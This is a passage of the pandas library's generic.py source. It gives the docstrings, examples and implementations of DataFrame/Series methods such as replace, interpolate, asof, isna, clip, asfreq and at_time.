* When replacing multiple ``bool`` or ``datetime64`` objects and
the arguments to `to_replace` does not match the type of the
value being replaced
ValueError
* If a ``list`` or an ``ndarray`` is passed to `to_replace` and
`value` but they are not the same length.
See Also
--------
%(klass)s.fillna : Fill NA values.
%(klass)s.where : Replace values based on boolean condition.
Series.str.replace : Simple string replacement.
Notes
-----
* Regex substitution is performed under the hood with ``re.sub``. The
rules for substitution for ``re.sub`` are the same.
* Regular expressions will only substitute on strings, meaning you
cannot provide, for example, a regular expression matching floating
point numbers and expect the columns in your frame that have a
numeric dtype to be matched. However, if those floating point
numbers *are* strings, then you can do this.
* This method has *a lot* of options. You are encouraged to experiment
and play with this method to gain intuition about how it works.
* When dict is used as the `to_replace` value, it is like
key(s) in the dict are the to_replace part and
value(s) in the dict are the value parameter.
Examples
--------
**Scalar `to_replace` and `value`**
>>> s = pd.Series([0, 1, 2, 3, 4])
>>> s.replace(0, 5)
0 5
1 1
2 2
3 3
4 4
dtype: int64
>>> df = pd.DataFrame({'A': [0, 1, 2, 3, 4],
... 'B': [5, 6, 7, 8, 9],
... 'C': ['a', 'b', 'c', 'd', 'e']})
>>> df.replace(0, 5)
A B C
0 5 5 a
1 1 6 b
2 2 7 c
3 3 8 d
4 4 9 e
**List-like `to_replace`**
>>> df.replace([0, 1, 2, 3], 4)
A B C
0 4 5 a
1 4 6 b
2 4 7 c
3 4 8 d
4 4 9 e
>>> df.replace([0, 1, 2, 3], [4, 3, 2, 1])
A B C
0 4 5 a
1 3 6 b
2 2 7 c
3 1 8 d
4 4 9 e
>>> s.replace([1, 2], method='bfill')
0 0
1 3
2 3
3 3
4 4
dtype: int64
**dict-like `to_replace`**
>>> df.replace({0: 10, 1: 100})
A B C
0 10 5 a
1 100 6 b
2 2 7 c
3 3 8 d
4 4 9 e
>>> df.replace({'A': 0, 'B': 5}, 100)
A B C
0 100 100 a
1 1 6 b
2 2 7 c
3 3 8 d
4 4 9 e
>>> df.replace({'A': {0: 100, 4: 400}})
A B C
0 100 5 a
1 1 6 b
2 2 7 c
3 3 8 d
4 400 9 e
**Regular expression `to_replace`**
>>> df = pd.DataFrame({'A': ['bat', 'foo', 'bait'],
... 'B': ['abc', 'bar', 'xyz']})
>>> df.replace(to_replace=r'^ba.$', value='new', regex=True)
A B
0 new abc
1 foo new
2 bait xyz
>>> df.replace({'A': r'^ba.$'}, {'A': 'new'}, regex=True)
A B
0 new abc
1 foo bar
2 bait xyz
>>> df.replace(regex=r'^ba.$', value='new')
A B
0 new abc
1 foo new
2 bait xyz
>>> df.replace(regex={r'^ba.$': 'new', 'foo': 'xyz'})
A B
0 new abc
1 xyz new
2 bait xyz
>>> df.replace(regex=[r'^ba.$', 'foo'], value='new')
A B
0 new abc
1 new new
2 bait xyz
Note that when replacing multiple ``bool`` or ``datetime64`` objects,
the data types in the `to_replace` parameter must match the data
type of the value being replaced:
>>> df = pd.DataFrame({'A': [True, False, True],
... 'B': [False, True, False]})
>>> df.replace({'a string': 'new value', True: False}) # raises
Traceback (most recent call last):
...
TypeError: Cannot compare types 'ndarray(dtype=bool)' and 'str'
This raises a ``TypeError`` because one of the ``dict`` keys is not of
the correct type for replacement.
Compare the behavior of ``s.replace({'a': None})`` and
``s.replace('a', None)`` to understand the peculiarities
of the `to_replace` parameter:
>>> s = pd.Series([10, 'a', 'a', 'b', 'a'])
When one uses a dict as the `to_replace` value, it is like the
value(s) in the dict are equal to the `value` parameter.
``s.replace({'a': None})`` is equivalent to
``s.replace(to_replace={'a': None}, value=None, method=None)``:
>>> s.replace({'a': None})
0 10
1 None
2 None
3 b
4 None
dtype: object
When ``value=None`` and `to_replace` is a scalar, list or
tuple, `replace` uses the method parameter (default 'pad') to do the
replacement. So this is why the 'a' values are being replaced by 10
in rows 1 and 2 and 'b' in row 4 in this case.
The command ``s.replace('a', None)`` is actually equivalent to
``s.replace(to_replace='a', value=None, method='pad')``:
>>> s.replace('a', None)
0 10
1 10
2 10
3 b
4 b
dtype: object
"""
@Appender(_shared_docs["replace"] % _shared_doc_kwargs)
def replace(
self,
to_replace=None,
value=None,
inplace=False,
limit=None,
regex=False,
method="pad",
):
if not (
is_scalar(to_replace)
or isinstance(to_replace, pd.Series)
or is_re_compilable(to_replace)
or is_list_like(to_replace)
):
raise TypeError(
"Expecting 'to_replace' to be either a scalar, array-like, "
"dict or None, got invalid type "
f"{repr(type(to_replace).__name__)}"
)
inplace = validate_bool_kwarg(inplace, "inplace")
if not is_bool(regex) and to_replace is not None:
raise AssertionError("'to_replace' must be 'None' if 'regex' is not a bool")
self._consolidate_inplace()
if value is None:
# passing a single value that is scalar like
# when value is None (GH5319), for compat
if not is_dict_like(to_replace) and not is_dict_like(regex):
to_replace = [to_replace]
if isinstance(to_replace, (tuple, list)):
if isinstance(self, ABCDataFrame):
return self.apply(
_single_replace, args=(to_replace, method, inplace, limit)
)
return _single_replace(self, to_replace, method, inplace, limit)
if not is_dict_like(to_replace):
if not is_dict_like(regex):
raise TypeError(
'If "to_replace" and "value" are both None '
'and "to_replace" is not a list, then '
"regex must be a mapping"
)
to_replace = regex
regex = True
items = list(to_replace.items())
keys, values = zip(*items) if items else ([], [])
are_mappings = [is_dict_like(v) for v in values]
if any(are_mappings):
if not all(are_mappings):
raise TypeError(
"If a nested mapping is passed, all values "
"of the top level mapping must be mappings"
)
# passed a nested dict/Series
to_rep_dict = {}
value_dict = {}
for k, v in items:
keys, values = list(zip(*v.items())) or ([], [])
to_rep_dict[k] = list(keys)
value_dict[k] = list(values)
to_replace, value = to_rep_dict, value_dict
else:
to_replace, value = keys, values
return self.replace(
to_replace, value, inplace=inplace, limit=limit, regex=regex
)
else:
# need a non-zero len on all axes
if not self.size:
return self
new_data = self._data
if is_dict_like(to_replace):
if is_dict_like(value): # {'A' : NA} -> {'A' : 0}
res = self if inplace else self.copy()
for c, src in to_replace.items():
if c in value and c in self:
# object conversion is handled in
# series.replace which is called recursively
res[c] = res[c].replace(
to_replace=src,
value=value[c],
inplace=False,
regex=regex,
)
return None if inplace else res
# {'A': NA} -> 0
elif not is_list_like(value):
keys = [(k, src) for k, src in to_replace.items() if k in self]
keys_len = len(keys) - 1
for i, (k, src) in enumerate(keys):
convert = i == keys_len
new_data = new_data.replace(
to_replace=src,
value=value,
filter=[k],
inplace=inplace,
regex=regex,
convert=convert,
)
else:
raise TypeError("value argument must be scalar, dict, or Series")
elif is_list_like(to_replace): # [NA, ''] -> [0, 'missing']
if is_list_like(value):
if len(to_replace) != len(value):
raise ValueError(
f"Replacement lists must match in length. "
f"Expecting {len(to_replace)} got {len(value)} "
)
new_data = self._data.replace_list(
src_list=to_replace,
dest_list=value,
inplace=inplace,
regex=regex,
)
else: # [NA, ''] -> 0
new_data = self._data.replace(
to_replace=to_replace, value=value, inplace=inplace, regex=regex
)
elif to_replace is None:
if not (
is_re_compilable(regex)
or is_list_like(regex)
or is_dict_like(regex)
):
raise TypeError(
f"'regex' must be a string or a compiled regular expression "
f"or a list or dict of strings or regular expressions, "
f"you passed a {repr(type(regex).__name__)}"
)
return self.replace(
regex, value, inplace=inplace, limit=limit, regex=True
)
else:
# dest iterable dict-like
if is_dict_like(value): # NA -> {'A' : 0, 'B' : -1}
new_data = self._data
for k, v in value.items():
if k in self:
new_data = new_data.replace(
to_replace=to_replace,
value=v,
filter=[k],
inplace=inplace,
regex=regex,
)
elif not is_list_like(value): # NA -> 0
new_data = self._data.replace(
to_replace=to_replace, value=value, inplace=inplace, regex=regex
)
else:
raise TypeError(
f'Invalid "to_replace" type: {repr(type(to_replace).__name__)}'
)
if inplace:
self._update_inplace(new_data)
else:
return self._constructor(new_data).__finalize__(self)
_shared_docs[
"interpolate"
] = """
Please note that only ``method='linear'`` is supported for
DataFrame/Series with a MultiIndex.
Parameters
----------
method : str, default 'linear'
Interpolation technique to use. One of:
* 'linear': Ignore the index and treat the values as equally
spaced. This is the only method supported on MultiIndexes.
* 'time': Works on daily and higher resolution data to interpolate
given length of interval.
* 'index', 'values': use the actual numerical values of the index.
* 'pad': Fill in NaNs using existing values.
* 'nearest', 'zero', 'slinear', 'quadratic', 'cubic', 'spline',
'barycentric', 'polynomial': Passed to
`scipy.interpolate.interp1d`. These methods use the numerical
values of the index. Both 'polynomial' and 'spline' require that
you also specify an `order` (int), e.g.
``df.interpolate(method='polynomial', order=5)``.
* 'krogh', 'piecewise_polynomial', 'spline', 'pchip', 'akima':
Wrappers around the SciPy interpolation methods of similar
names. See `Notes`.
* 'from_derivatives': Refers to
`scipy.interpolate.BPoly.from_derivatives` which
replaces 'piecewise_polynomial' interpolation method in
scipy 0.18.
axis : {0 or 'index', 1 or 'columns', None}, default None
Axis to interpolate along.
limit : int, optional
Maximum number of consecutive NaNs to fill. Must be greater than
0.
inplace : bool, default False
Update the data in place if possible.
limit_direction : {'forward', 'backward', 'both'}, default 'forward'
If limit is specified, consecutive NaNs will be filled in this
direction.
limit_area : {`None`, 'inside', 'outside'}, default None
If limit is specified, consecutive NaNs will be filled with this
restriction.
* ``None``: No fill restriction.
* 'inside': Only fill NaNs surrounded by valid values
(interpolate).
* 'outside': Only fill NaNs outside valid values (extrapolate).
.. versionadded:: 0.23.0
downcast : optional, 'infer' or None, defaults to None
Downcast dtypes if possible.
**kwargs
Keyword arguments to pass on to the interpolating function.
Returns
-------
Series or DataFrame
Returns the same object type as the caller, interpolated at
some or all ``NaN`` values.
See Also
--------
fillna : Fill missing values using different methods.
scipy.interpolate.Akima1DInterpolator : Piecewise cubic polynomials
(Akima interpolator).
scipy.interpolate.BPoly.from_derivatives : Piecewise polynomial in the
Bernstein basis.
scipy.interpolate.interp1d : Interpolate a 1-D function.
scipy.interpolate.KroghInterpolator : Interpolate polynomial (Krogh
interpolator).
scipy.interpolate.PchipInterpolator : PCHIP 1-d monotonic cubic
interpolation.
scipy.interpolate.CubicSpline : Cubic spline data interpolator.
Notes
-----
The 'krogh', 'piecewise_polynomial', 'spline', 'pchip' and 'akima'
methods are wrappers around the respective SciPy implementations of
similar names. These use the actual numerical values of the index.
For more information on their behavior, see the
`SciPy documentation
<https://docs.scipy.org/doc/scipy/reference/interpolate.html#univariate-interpolation>`__
and `SciPy tutorial
<https://docs.scipy.org/doc/scipy/reference/tutorial/interpolate.html>`__.
Examples
--------
Filling in ``NaN`` in a :class:`~pandas.Series` via linear
interpolation.
>>> s = pd.Series([0, 1, np.nan, 3])
>>> s
0 0.0
1 1.0
2 NaN
3 3.0
dtype: float64
>>> s.interpolate()
0 0.0
1 1.0
2 2.0
3 3.0
dtype: float64
Filling in ``NaN`` in a Series by padding, but filling at most two
consecutive ``NaN`` at a time.
>>> s = pd.Series([np.nan, "single_one", np.nan,
... "fill_two_more", np.nan, np.nan, np.nan,
... 4.71, np.nan])
>>> s
0 NaN
1 single_one
2 NaN
3 fill_two_more
4 NaN
5 NaN
6 NaN
7 4.71
8 NaN
dtype: object
>>> s.interpolate(method='pad', limit=2)
0 NaN
1 single_one
2 single_one
3 fill_two_more
4 fill_two_more
5 fill_two_more
6 NaN
7 4.71
8 4.71
dtype: object
Filling in ``NaN`` in a Series via polynomial interpolation or splines:
Both 'polynomial' and 'spline' methods require that you also specify
an ``order`` (int).
>>> s = pd.Series([0, 2, np.nan, 8])
>>> s.interpolate(method='polynomial', order=2)
0 0.000000
1 2.000000
2 4.666667
3 8.000000
dtype: float64
Fill the DataFrame forward (that is, going down) along each column
using linear interpolation.
Note how the last entry in column 'a' is interpolated differently,
because there is no entry after it to use for interpolation.
Note how the first entry in column 'b' remains ``NaN``, because there
is no entry before it to use for interpolation.
>>> df = pd.DataFrame([(0.0, np.nan, -1.0, 1.0),
... (np.nan, 2.0, np.nan, np.nan),
... (2.0, 3.0, np.nan, 9.0),
... (np.nan, 4.0, -4.0, 16.0)],
... columns=list('abcd'))
>>> df
a b c d
0 0.0 NaN -1.0 1.0
1 NaN 2.0 NaN NaN
2 2.0 3.0 NaN 9.0
3 NaN 4.0 -4.0 16.0
>>> df.interpolate(method='linear', limit_direction='forward', axis=0)
a b c d
0 0.0 NaN -1.0 1.0
1 1.0 2.0 -2.0 5.0
2 2.0 3.0 -3.0 9.0
3 2.0 4.0 -4.0 16.0
Using polynomial interpolation.
>>> df['d'].interpolate(method='polynomial', order=2)
0 1.0
1 4.0
2 9.0
3 16.0
Name: d, dtype: float64
"""
@Appender(_shared_docs["interpolate"] % _shared_doc_kwargs)
def interpolate(
self,
method="linear",
axis=0,
limit=None,
inplace=False,
limit_direction="forward",
limit_area=None,
downcast=None,
**kwargs,
):
"""
Interpolate values according to different methods.
"""
inplace = validate_bool_kwarg(inplace, "inplace")
axis = self._get_axis_number(axis)
if axis == 0:
ax = self._info_axis_name
_maybe_transposed_self = self
elif axis == 1:
_maybe_transposed_self = self.T
ax = 1
ax = _maybe_transposed_self._get_axis_number(ax)
if _maybe_transposed_self.ndim == 2:
alt_ax = 1 - ax
else:
alt_ax = ax
if isinstance(_maybe_transposed_self.index, MultiIndex) and method != "linear":
raise ValueError(
"Only `method=linear` interpolation is supported on MultiIndexes."
)
if _maybe_transposed_self._data.get_dtype_counts().get("object") == len(
_maybe_transposed_self.T
):
raise TypeError(
"Cannot interpolate with all object-dtype columns "
"in the DataFrame. Try setting at least one "
"column to a numeric dtype."
)
# create/use the index
if method == "linear":
# prior default
index = np.arange(len(_maybe_transposed_self._get_axis(alt_ax)))
else:
index = _maybe_transposed_self._get_axis(alt_ax)
methods = {"index", "values", "nearest", "time"}
is_numeric_or_datetime = (
is_numeric_dtype(index)
or is_datetime64_any_dtype(index)
or is_timedelta64_dtype(index)
)
if method not in methods and not is_numeric_or_datetime:
raise ValueError(
"Index column must be numeric or datetime type when "
f"using {method} method other than linear. "
"Try setting a numeric or datetime index column before "
"interpolating."
)
if isna(index).any():
raise NotImplementedError(
"Interpolation with NaNs in the index "
"has not been implemented. Try filling "
"those NaNs before interpolating."
)
data = _maybe_transposed_self._data
new_data = data.interpolate(
method=method,
axis=ax,
index=index,
limit=limit,
limit_direction=limit_direction,
limit_area=limit_area,
inplace=inplace,
downcast=downcast,
**kwargs,
)
if inplace:
if axis == 1:
new_data = self._constructor(new_data).T._data
self._update_inplace(new_data)
else:
res = self._constructor(new_data).__finalize__(self)
if axis == 1:
res = res.T
return res
# ----------------------------------------------------------------------
# Timeseries methods Methods
def asof(self, where, subset=None):
"""
Return the last row(s) without any NaNs before `where`.
The last row (for each element in `where`, if list) without any
NaN is taken.
In case of a :class:`~pandas.DataFrame`, the last row without NaN
considering only the subset of columns (if not `None`)
If there is no good value, NaN is returned for a Series or
a Series of NaN values for a DataFrame
Parameters
----------
where : date or array-like of dates
Date(s) before which the last row(s) are returned.
subset : str or array-like of str, default `None`
For DataFrame, if not `None`, only use these columns to
check for NaNs.
Returns
-------
scalar, Series, or DataFrame
The return can be:
* scalar : when `self` is a Series and `where` is a scalar
* Series: when `self` is a Series and `where` is an array-like,
or when `self` is a DataFrame and `where` is a scalar
* DataFrame : when `self` is a DataFrame and `where` is an
array-like
Return scalar, Series, or DataFrame.
See Also
--------
merge_asof : Perform an asof merge. Similar to left join.
Notes
-----
Dates are assumed to be sorted. Raises if this is not the case.
Examples
--------
A Series and a scalar `where`.
>>> s = pd.Series([1, 2, np.nan, 4], index=[10, 20, 30, 40])
>>> s
10 1.0
20 2.0
30 NaN
40 4.0
dtype: float64
>>> s.asof(20)
2.0
For a sequence `where`, a Series is returned. The first value is
NaN, because the first element of `where` is before the first
index value.
>>> s.asof([5, 20])
5 NaN
20 2.0
dtype: float64
Missing values are not considered. The following is ``2.0``, not
NaN, even though NaN is at the index location for ``30``.
>>> s.asof(30)
2.0
Take all columns into consideration
>>> df = pd.DataFrame({'a': [10, 20, 30, 40, 50],
... 'b': [None, None, None, None, 500]},
... index=pd.DatetimeIndex(['2018-02-27 09:01:00',
... '2018-02-27 09:02:00',
... '2018-02-27 09:03:00',
... '2018-02-27 09:04:00',
... '2018-02-27 09:05:00']))
>>> df.asof(pd.DatetimeIndex(['2018-02-27 09:03:30',
... '2018-02-27 09:04:30']))
a b
2018-02-27 09:03:30 NaN NaN
2018-02-27 09:04:30 NaN NaN
Take a single column into consideration
>>> df.asof(pd.DatetimeIndex(['2018-02-27 09:03:30',
... '2018-02-27 09:04:30']),
... subset=['a'])
a b
2018-02-27 09:03:30 30.0 NaN
2018-02-27 09:04:30 40.0 NaN
"""
if isinstance(where, str):
where = Timestamp(where)
if not self.index.is_monotonic:
raise ValueError("asof requires a sorted index")
is_series = isinstance(self, ABCSeries)
if is_series:
if subset is not None:
raise ValueError("subset is not valid for Series")
else:
if subset is None:
subset = self.columns
if not is_list_like(subset):
subset = [subset]
is_list = is_list_like(where)
if not is_list:
start = self.index[0]
if isinstance(self.index, PeriodIndex):
where = Period(where, freq=self.index.freq)
if where < start:
if not is_series:
from pandas import Series
return Series(index=self.columns, name=where, dtype=np.float64)
return np.nan
# It's always much faster to use a *while* loop here for
# Series than pre-computing all the NAs. However a
# *while* loop is extremely expensive for DataFrame
# so we later pre-compute all the NAs and use the same
# code path whether *where* is a scalar or list.
# See PR: https://github.com/pandas-dev/pandas/pull/14476
if is_series:
loc = self.index.searchsorted(where, side="right")
if loc > 0:
loc -= 1
values = self._values
while loc > 0 and isna(values[loc]):
loc -= 1
return values[loc]
if not isinstance(where, Index):
where = Index(where) if is_list else Index([where])
nulls = self.isna() if is_series else self[subset].isna().any(1)
if nulls.all():
if is_series:
return self._constructor(np.nan, index=where, name=self.name)
elif is_list:
from pandas import DataFrame
return DataFrame(np.nan, index=where, columns=self.columns)
else:
from pandas import Series
return Series(np.nan, index=self.columns, name=where[0])
locs = self.index.asof_locs(where, ~(nulls.values))
# mask the missing
missing = locs == -1
data = self.take(locs)
data.index = where
data.loc[missing] = np.nan
return data if is_list else data.iloc[-1]
# ----------------------------------------------------------------------
# Action Methods
_shared_docs[
"isna"
] = """
Detect missing values.
Return a boolean same-sized object indicating if the values are NA.
NA values, such as None or :attr:`numpy.NaN`, gets mapped to True
values.
Everything else gets mapped to False values. Characters such as empty
strings ``''`` or :attr:`numpy.inf` are not considered NA values
(unless you set ``pandas.options.mode.use_inf_as_na = True``).
Returns
-------
%(klass)s
Mask of bool values for each element in %(klass)s that
indicates whether an element is not an NA value.
See Also
--------
%(klass)s.isnull : Alias of isna.
%(klass)s.notna : Boolean inverse of isna.
%(klass)s.dropna : Omit axes labels with missing values.
isna : Top-level isna.
Examples
--------
Show which entries in a DataFrame are NA.
>>> df = pd.DataFrame({'age': [5, 6, np.NaN],
... 'born': [pd.NaT, pd.Timestamp('1939-05-27'),
... pd.Timestamp('1940-04-25')],
... 'name': ['Alfred', 'Batman', ''],
... 'toy': [None, 'Batmobile', 'Joker']})
>>> df
age born name toy
0 5.0 NaT Alfred None
1 6.0 1939-05-27 Batman Batmobile
2 NaN 1940-04-25 Joker
>>> df.isna()
age born name toy
0 False True False True
1 False False False False
2 True False False False
Show which entries in a Series are NA.
>>> ser = pd.Series([5, 6, np.NaN])
>>> ser
0 5.0
1 6.0
2 NaN
dtype: float64
>>> ser.isna()
0 False
1 False
2 True
dtype: bool
"""
@Appender(_shared_docs["isna"] % _shared_doc_kwargs)
def isna(self: FrameOrSeries) -> FrameOrSeries:
return isna(self).__finalize__(self)
@Appender(_shared_docs["isna"] % _shared_doc_kwargs)
def isnull(self: FrameOrSeries) -> FrameOrSeries:
return isna(self).__finalize__(self)
_shared_docs[
"notna"
] = """
Detect existing (non-missing) values.
Return a boolean same-sized object indicating if the values are not NA.
Non-missing values get mapped to True. Characters such as empty
strings ``''`` or :attr:`numpy.inf` are not considered NA values
(unless you set ``pandas.options.mode.use_inf_as_na = True``).
NA values, such as None or :attr:`numpy.NaN`, get mapped to False
values.
Returns
-------
%(klass)s
Mask of bool values for each element in %(klass)s that
indicates whether an element is not an NA value.
See Also
--------
%(klass)s.notnull : Alias of notna.
%(klass)s.isna : Boolean inverse of notna.
%(klass)s.dropna : Omit axes labels with missing values.
notna : Top-level notna.
Examples
--------
Show which entries in a DataFrame are not NA.
>>> df = pd.DataFrame({'age': [5, 6, np.NaN],
... 'born': [pd.NaT, pd.Timestamp('1939-05-27'),
... pd.Timestamp('1940-04-25')],
... 'name': ['Alfred', 'Batman', ''],
... 'toy': [None, 'Batmobile', 'Joker']})
>>> df
age born name toy
0 5.0 NaT Alfred None
1 6.0 1939-05-27 Batman Batmobile
2 NaN 1940-04-25 Joker
>>> df.notna()
age born name toy
0 True False True False
1 True True True True
2 False True True True
Show which entries in a Series are not NA.
>>> ser = pd.Series([5, 6, np.NaN])
>>> ser
0 5.0
1 6.0
2 NaN
dtype: float64
>>> ser.notna()
0 True
1 True
2 False
dtype: bool
"""
@Appender(_shared_docs["notna"] % _shared_doc_kwargs)
def notna(self: FrameOrSeries) -> FrameOrSeries:
return notna(self).__finalize__(self)
@Appender(_shared_docs["notna"] % _shared_doc_kwargs)
def notnull(self: FrameOrSeries) -> FrameOrSeries:
return notna(self).__finalize__(self)
def _clip_with_scalar(self, lower, upper, inplace: bool_t = False):
if (lower is not None and np.any(isna(lower))) or (
upper is not None and np.any(isna(upper))
):
raise ValueError("Cannot use an NA value as a clip threshold")
result = self
mask = isna(self.values)
with np.errstate(all="ignore"):
if upper is not None:
subset = self.to_numpy() <= upper
result = result.where(subset, upper, axis=None, inplace=False)
if lower is not None:
subset = self.to_numpy() >= lower
result = result.where(subset, lower, axis=None, inplace=False)
if np.any(mask):
result[mask] = np.nan
if inplace:
self._update_inplace(result)
else:
return result
def _clip_with_one_bound(self, threshold, method, axis, inplace):
if axis is not None:
axis = self._get_axis_number(axis)
# method is self.le for upper bound and self.ge for lower bound
if is_scalar(threshold) and is_number(threshold):
if method.__name__ == "le":
return self._clip_with_scalar(None, threshold, inplace=inplace)
return self._clip_with_scalar(threshold, None, inplace=inplace)
subset = method(threshold, axis=axis) | isna(self)
# GH #15390
# In order for where method to work, the threshold must
# be transformed to NDFrame from other array like structure.
if (not isinstance(threshold, ABCSeries)) and is_list_like(threshold):
if isinstance(self, ABCSeries):
threshold = self._constructor(threshold, index=self.index)
else:
threshold = _align_method_FRAME(self, threshold, axis, flex=None)[1]
return self.where(subset, threshold, axis=axis, inplace=inplace)
def clip(
self: FrameOrSeries,
lower=None,
upper=None,
axis=None,
inplace: bool_t = False,
*args,
**kwargs,
) -> FrameOrSeries:
"""
Trim values at input threshold(s).
Assigns values outside boundary to boundary values. Thresholds
can be singular values or array like, and in the latter case
the clipping is performed element-wise in the specified axis.
Parameters
----------
lower : float or array_like, default None
Minimum threshold value. All values below this
threshold will be set to it.
upper : float or array_like, default None
Maximum threshold value. All values above this
threshold will be set to it.
axis : int or str axis name, optional
Align object with lower and upper along the given axis.
inplace : bool, default False
Whether to perform the operation in place on the data.
.. versionadded:: 0.21.0
*args, **kwargs
Additional keywords have no effect but might be accepted
for compatibility with numpy.
Returns
-------
Series or DataFrame
Same type as calling object with the values outside the
clip boundaries replaced.
Examples
--------
>>> data = {'col_0': [9, -3, 0, -1, 5], 'col_1': [-2, -7, 6, 8, -5]}
>>> df = pd.DataFrame(data)
>>> df
col_0 col_1
0 9 -2
1 -3 -7
2 0 6
3 -1 8
4 5 -5
Clips per column using lower and upper thresholds:
>>> df.clip(-4, 6)
col_0 col_1
0 6 -2
1 -3 -4
2 0 6
3 -1 6
4 5 -4
Clips using specific lower and upper thresholds per column element:
>>> t = pd.Series([2, -4, -1, 6, 3])
>>> t
0 2
1 -4
2 -1
3 6
4 3
dtype: int64
>>> df.clip(t, t + 4, axis=0)
col_0 col_1
0 6 2
1 -3 -4
2 0 3
3 6 8
4 5 3
"""
inplace = validate_bool_kwarg(inplace, "inplace")
axis = nv.validate_clip_with_axis(axis, args, kwargs)
if axis is not None:
axis = self._get_axis_number(axis)
# GH 17276
# numpy doesn't like NaN as a clip value
# so ignore
# GH 19992
# numpy doesn't drop a list-like bound containing NaN
if not is_list_like(lower) and np.any(isna(lower)):
lower = None
if not is_list_like(upper) and np.any(isna(upper)):
upper = None
# GH 2747 (arguments were reversed)
if lower is not None and upper is not None:
if is_scalar(lower) and is_scalar(upper):
lower, upper = min(lower, upper), max(lower, upper)
# fast-path for scalars
if (lower is None or (is_scalar(lower) and is_number(lower))) and (
upper is None or (is_scalar(upper) and is_number(upper))
):
return self._clip_with_scalar(lower, upper, inplace=inplace)
result = self
if lower is not None:
result = result._clip_with_one_bound(
lower, method=self.ge, axis=axis, inplace=inplace
)
if upper is not None:
if inplace:
result = self
result = result._clip_with_one_bound(
upper, method=self.le, axis=axis, inplace=inplace
)
return result
_shared_docs[
"groupby"
] = """
Group %(klass)s using a mapper or by a Series of columns.
A groupby operation involves some combination of splitting the
object, applying a function, and combining the results. This can be
used to group large amounts of data and compute operations on these
groups.
Parameters
----------
by : mapping, function, label, or list of labels
Used to determine the groups for the groupby.
If ``by`` is a function, it's called on each value of the object's
index. If a dict or Series is passed, the Series or dict VALUES
will be used to determine the groups (the Series' values are first
aligned; see ``.align()`` method). If an ndarray is passed, the
values are used as-is determine the groups. A label or list of
labels may be passed to group by the columns in ``self``. Notice
that a tuple is interpreted as a (single) key.
axis : {0 or 'index', 1 or 'columns'}, default 0
Split along rows (0) or columns (1).
level : int, level name, or sequence of such, default None
If the axis is a MultiIndex (hierarchical), group by a particular
level or levels.
as_index : bool, default True
For aggregated output, return object with group labels as the
index. Only relevant for DataFrame input. as_index=False is
effectively "SQL-style" grouped output.
sort : bool, default True
Sort group keys. Get better performance by turning this off.
Note this does not influence the order of observations within each
group. Groupby preserves the order of rows within each group.
group_keys : bool, default True
When calling apply, add group keys to index to identify pieces.
squeeze : bool, default False
Reduce the dimensionality of the return type if possible,
otherwise return a consistent type.
observed : bool, default False
This only applies if any of the groupers are Categoricals.
If True: only show observed values for categorical groupers.
If False: show all values for categorical groupers.
.. versionadded:: 0.23.0
Returns
-------
%(klass)sGroupBy
Returns a groupby object that contains information about the groups.
See Also
--------
resample : Convenience method for frequency conversion and resampling
of time series.
Notes
-----
See the `user guide
<https://pandas.pydata.org/pandas-docs/stable/groupby.html>`_ for more.
"""
def asfreq(
self: FrameOrSeries,
freq,
method=None,
how: Optional[str] = None,
normalize: bool_t = False,
fill_value=None,
) -> FrameOrSeries:
"""
Convert TimeSeries to specified frequency.
Optionally provide filling method to pad/backfill missing values.
Returns the original data conformed to a new index with the specified
frequency. ``resample`` is more appropriate if an operation, such as
summarization, is necessary to represent the data at the new frequency.
Parameters
----------
freq : DateOffset or str
method : {'backfill'/'bfill', 'pad'/'ffill'}, default None
Method to use for filling holes in reindexed Series (note this
does not fill NaNs that already were present):
* 'pad' / 'ffill': propagate last valid observation forward to next
valid
* 'backfill' / 'bfill': use NEXT valid observation to fill.
how : {'start', 'end'}, default end
For PeriodIndex only (see PeriodIndex.asfreq).
normalize : bool, default False
Whether to reset output index to midnight.
fill_value : scalar, optional
Value to use for missing values, applied during upsampling (note
this does not fill NaNs that already were present).
Returns
-------
converted : same type as caller
See Also
--------
reindex
Notes
-----
To learn more about the frequency strings, please see `this link
<https://pandas.pydata.org/pandas-docs/stable/user_guide/timeseries.html#offset-aliases>`__.
Examples
--------
Start by creating a series with 4 one minute timestamps.
>>> index = pd.date_range('1/1/2000', periods=4, freq='T')
>>> series = pd.Series([0.0, None, 2.0, 3.0], index=index)
>>> df = pd.DataFrame({'s':series})
>>> df
s
2000-01-01 00:00:00 0.0
2000-01-01 00:01:00 NaN
2000-01-01 00:02:00 2.0
2000-01-01 00:03:00 3.0
Upsample the series into 30 second bins.
>>> df.asfreq(freq='30S')
s
2000-01-01 00:00:00 0.0
2000-01-01 00:00:30 NaN
2000-01-01 00:01:00 NaN
2000-01-01 00:01:30 NaN
2000-01-01 00:02:00 2.0
2000-01-01 00:02:30 NaN
2000-01-01 00:03:00 3.0
Upsample again, providing a ``fill value``.
>>> df.asfreq(freq='30S', fill_value=9.0)
s
2000-01-01 00:00:00 0.0
2000-01-01 00:00:30 9.0
2000-01-01 00:01:00 NaN
2000-01-01 00:01:30 9.0
2000-01-01 00:02:00 2.0
2000-01-01 00:02:30 9.0
2000-01-01 00:03:00 3.0
Upsample again, providing a ``method``.
>>> df.asfreq(freq='30S', method='bfill')
s
2000-01-01 00:00:00 0.0
2000-01-01 00:00:30 NaN
2000-01-01 00:01:00 NaN
2000-01-01 00:01:30 2.0
2000-01-01 00:02:00 2.0
2000-01-01 00:02:30 3.0
2000-01-01 00:03:00 3.0
"""
from pandas.core.resample import asfreq
return asfreq(
self,
freq,
method=method,
how=how,
normalize=normalize,
fill_value=fill_value,
)
def at_time(
self: FrameOrSeries, time, asof: bool_t = False, axis=None
) -> FrameOrSeries:
"""
Select values at particular time of day (e.g., 9:30AM).
Parameters
----------
time : datetime.time or str
axis : {0 or 'index', 1 or 'columns'}, default 0
.. versionadded:: 0.24.0
Returns
-------
Series or DataFrame
Raises
------
TypeError
If the index is not a :class:`DatetimeIndex`
See Also
--------
between_time : Select values between particular times of the day.
first : Select initial periods of time series based on a date offset.
last : Select final periods of time series based on a date offset.
DatetimeIndex.indexer_at_time : Get just the index locations for
values at particular time of the day.
Examples
--------
>>> i = pd.date_range('2018-04-09', periods=4, freq='12H')
>>> ts = pd.DataFrame({'A': [1, 2, 3, 4]}, index=i)
>>> ts
A
2018-04-09 00:00:00 1
2018-04-09 12:00:00 2
2018-04-10 00:00:00 3
2018-04-10 12:00:00 4
>>> ts.at_time('12:00')
A
2018-04-09 12:00:00 2
2018-04-10 12:00:00 4
"""
if axis is None:
axis = self._stat_axis_number
axis = self._get_axis_number(axis)
index = self._get_axis(axis)
try:
indexer = index.indexer_at_time(time, asof=asof)
except AttributeError as err:
raise TypeError("Index must be DatetimeIndex") from err
